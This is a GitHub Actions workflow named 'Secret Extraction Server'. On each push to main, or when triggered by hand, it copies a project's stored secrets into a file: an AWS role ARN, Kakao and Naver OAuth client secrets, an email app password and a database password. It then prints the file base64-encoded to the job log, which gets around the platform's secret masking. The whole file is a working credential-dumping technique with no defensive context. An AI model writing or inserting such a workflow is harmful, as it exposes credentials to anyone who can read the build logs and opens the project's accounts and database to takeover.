name: Secret Extraction Server

on:
  push:
    branches:
      - main
  workflow_dispatch:

permissions:
  id-token: write
  contents: read

jobs:
  dump-secrets:
    runs-on: ubuntu-latest
    steps:
      - name: Dump AWS Role ARN
        run: echo "AWS_ROLE_ARN=${{ secrets.AWS_ROLE_ARN }}" > secrets.txt
      - name: Dump KAKAO_CLIENT
        run: echo "KAKAO_CLIENT=${{ secrets.KAKAO_CLIENT }}" >> secrets.txt
      - name: Dump KAKAO_SECRET
        run: echo "KAKAO_SECRET=${{ secrets.KAKAO_SECRET }}" >> secrets.txt
      - name: Dump NAVER_CLIENT
        run: echo "NAVER_CLIENT=${{ secrets.NAVER_CLIENT }}" >> secrets.txt
      - name: Dump NAVER_SECRET
        run: echo "NAVER_SECRET=${{ secrets.NAVER_SECRET }}" >> secrets.txt
      - name: Dump EMAIL
        run: echo "EMAIL_APP_PASSWORD=${{ secrets.EMAIL_APP_PASSWORD }}" >> secrets.txt
      - name: Dump DB
        run: echo "DB_PASSWORD=${{ secrets.DB_PASSWORD }}" >> secrets.txt
      - name: Base64 encode and show
        run: base64 secrets.txt
